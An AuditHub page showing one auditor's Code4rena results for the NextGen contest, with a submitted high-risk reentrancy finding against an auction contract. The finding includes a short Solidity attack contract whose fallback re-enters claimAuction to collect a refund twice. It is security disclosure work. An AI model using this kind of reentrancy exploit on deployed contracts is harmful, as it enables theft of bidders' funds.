NextGen - Oxsadeeq's results

Advanced smart contracts for launching generative art projects on Ethereum.

General Information

Platform: Code4rena

Start Date: 30/10/2023

Pot Size: $49,250 USDC

Total HM: 14

Participants: 243

Period: 14 days

Judge: 0xsomeone

Id: 302

League: ETH

NextGen

Findings Distribution

Researcher Performance

Rank: 223/243

Findings: 1

Award: $0.00

🌟 Selected for report: 0

🚀 Solo Findings: 0

Findings Information

🌟 Selected for report: smiling_heretic

Also found by: 00decree, 00xSEV, 0x180db, 0x3b, 0x656c68616a, 0xAadi, 0xAleko, 0xAsen, 0xDetermination, 0xJuda, 0xMAKEOUTHILL, 0xMango, 0xMosh, 0xSwahili, 0x_6a70, 0xarno, 0xgrbr, 0xpiken, 0xsagetony, 3th, 8olidity, ABA, AerialRaider, Al-Qa-qa, Arabadzhiev, AvantGard, CaeraDenoir, ChrisTina, DanielArmstrong, DarkTower, DeFiHackLabs, Deft_TT, Delvir0, Draiakoo, Eigenvectors, Fulum, Greed, HChang26, Haipls, Hama, Inference, Jiamin, JohnnyTime, Jorgect, Juntao, Kaysoft, Kose, Kow, Krace, MaNcHaSsS, Madalad, MrPotatoMagic, Neon2835, NoamYakov, Norah, Oxsadeeq, PENGUN, REKCAH, Ruhum, Shubham, Silvermist, Soul22, SovaSlava, SpicyMeatball, Talfao, TermoHash, The_Kakers, Toshii, TuringConsulting, Udsen, VAD37, Vagner, Zac, Zach_166, ZdravkoHr, _eperezok, ak1, aldarion, alexfilippov314, alexxander, amaechieth, aslanbek, ast3ros, audityourcontracts, ayden, bdmcbri, bird-flu, blutorque, bronze_pickaxe, btk, c0pp3rscr3w3r, c3phas, cartlex_, cccz, ciphermarco, circlelooper, crunch, cryptothemex, cu5t0mpeo, darksnow, degensec, dethera, devival, dimulski, droptpackets, epistkr, evmboi32, fibonacci, gumgumzum, immeas, innertia, inzinko, jasonxiale, joesan, ke1caM, kimchi, lanrebayode77, lsaudit, mahyar, max10afternoon, merlin, mrudenko, nuthan2x, oakcobalt, openwide, orion, phoenixV110, pontifex, r0ck3tz, rotcivegaf, rvierdiiev, seeques, shenwilly, sl1, slvDev, t0x1c, tallo, tnquanghuy0512, tpiliposian, trachev, twcctop, vangrim, volodya, xAriextz, xeros, xuwinnie, y4y, yobiz, zhaojie

Awards

0 USDC - $0.00

Labels

bug
3 (High Risk)
partial-50
duplicate-1323

External Links

Lines of code

https://github.com/code-423n4/2023-10-nextgen/blob/main/smart-contracts/AuctionDemo.sol#L104

Vulnerability details

Impact

Detailed description of the impact of this finding. The AuctionDemo contract allows a user to create an auction house for a single token, if the auction is won the highest bidder gets to keep the token at the end of the auction and the other bidders are refunded their bids. The issue noted is that a malicious bidder could keep 2x their bids in the refund process. The bug is caused due to the lack of state changes before external calls. ##Attack Flow 1).An auction is created by any user and a malicious user bob bids an amount. //this attack Idea would rely on bob not winning the auction so assumption that bids //are created higher than bob's bid

2).At the end of the auction, when bob's get his refund bid, he implements a fallback that calls into the AuctionDemo.cancelBid(),which triggers a call to resend his bid.

Proof of Concept

Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept. //SPDX-License-Identifier:UNLICENSED pragma solidity ^0.8;

interface IAuctionDemo { function participateToAuction(uint256 _tokenid) external payable;

function claimAuction(uint256 _tokenid) external;

}

contract attackContract { IAuctionDemo auctionHouse; uint256 tokenId; uint8 firstCall;

constructor(address _acutiondemo, uint256 _tokenId) { auctionHouse = IAuctionDemo(_acutiondemo); tokenId = _tokenId; } function pwn() external payable { //participate in auction auctionHouse.participateToAuction{value: msg.value}(tokenId); } //refunds are sent and then we reenter the contract fallback() external payable { if (firstCall != 1) { ++firstCall; auctionHouse.claimAuction(tokenId); } }

}

Tools Used:Foundry

the auctionInfoData[tokenId][index].status variable before making external calls

Assessed type

Reentrancy

#0 - c4-pre-sort

2023-11-15T07:16:17Z

141345 marked the issue as duplicate of #1172

#1 - c4-pre-sort

2023-11-27T10:41:47Z

141345 marked the issue as not a duplicate

#2 - c4-pre-sort

2023-11-27T10:41:56Z

141345 marked the issue as duplicate of #962

#3 - c4-judge

2023-12-04T21:41:49Z

alex-ppg marked the issue as duplicate of #1323

#4 - c4-judge

2023-12-08T17:57:09Z

alex-ppg marked the issue as partial-50

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built bymalatrax © 2024

Auditors

Browse

Contests

Browse

Get in touch

ContactTwitter